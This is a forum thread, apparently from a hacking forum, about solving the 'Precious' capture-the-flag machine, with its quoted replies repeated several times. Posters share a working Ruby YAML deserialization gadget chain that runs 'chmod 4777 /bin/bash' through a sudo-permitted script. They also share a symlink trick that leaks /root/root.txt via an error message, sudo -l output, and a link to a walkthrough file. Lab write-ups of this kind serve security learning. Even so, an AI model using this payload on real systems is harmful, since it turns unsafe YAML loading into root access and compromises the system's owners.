(November 26, 2022, 07:54 PM)loosie Wrote:

(November 26, 2022, 07:44 PM)11231123 Wrote: For root flag:

henry@precious:~$ ln -s /root/root.txt dependencies.yml
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
/opt/update_dependencies.rb:20:in `<main>': undefined method `each' for "<flag>":String (NoMethodError)

Ok then?

The flag will be  displayed there as a error string .

How do you guys know to work on the ruby? I know it has ruby by the response header but had not thought about it. Is it a sense that comes from experience?

(November 26, 2022, 07:46 PM)annehathaway Wrote: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
used payload2 worked like a charm, pretty straight forward box

+1

From the original payload, we can also modify a bit to have a SUID bash, more smart for a full access:

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod 4777 /bin/bash"
         method_id: :resolve

---

(November 27, 2022, 03:01 AM)AIAIIIIAK Wrote: How do you guys know to work on the ruby? I know it has ruby by the response header but had not thought about it. Is it a sense that comes from experience?

Hint:

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

(November 27, 2022, 03:07 AM)Himitsu Wrote:

(November 26, 2022, 07:46 PM)annehathaway Wrote: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
used payload2 worked like a charm, pretty straight forward box

+1


From the original payload, we can also modify a bit to have a SUID bash, more smart for a full access:

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod 4777 /bin/bash"
         method_id: :resolve

---

(November 27, 2022, 03:01 AM)AIAIIIIAK Wrote: How do you guys know to work on the ruby? I know it has ruby by the response header but had not thought about it. Is it a sense that comes from experience?

Hint:

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

Thanks! forgot to check the sudo -l command.

(November 27, 2022, 03:07 AM)Himitsu Wrote:

(November 26, 2022, 07:46 PM)annehathaway Wrote: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
used payload2 worked like a charm, pretty straight forward box

+1


From the original payload, we can also modify a bit to have a SUID bash, more smart for a full access:

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod 4777 /bin/bash"
         method_id: :resolve

---

(November 27, 2022, 03:01 AM)AIAIIIIAK Wrote: How do you guys know to work on the ruby? I know it has ruby by the response header but had not thought about it. Is it a sense that comes from experience?

Hint:

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

no need for  git_set: "chmod 4777 /bin/bash"
git_set: "/bin/bash" is sufficient for root access.

what pdf do I use please

Step by Step Walkthrough
https://anonfiles.com/K9c0O5J8yf/precious_walkthrough_pdf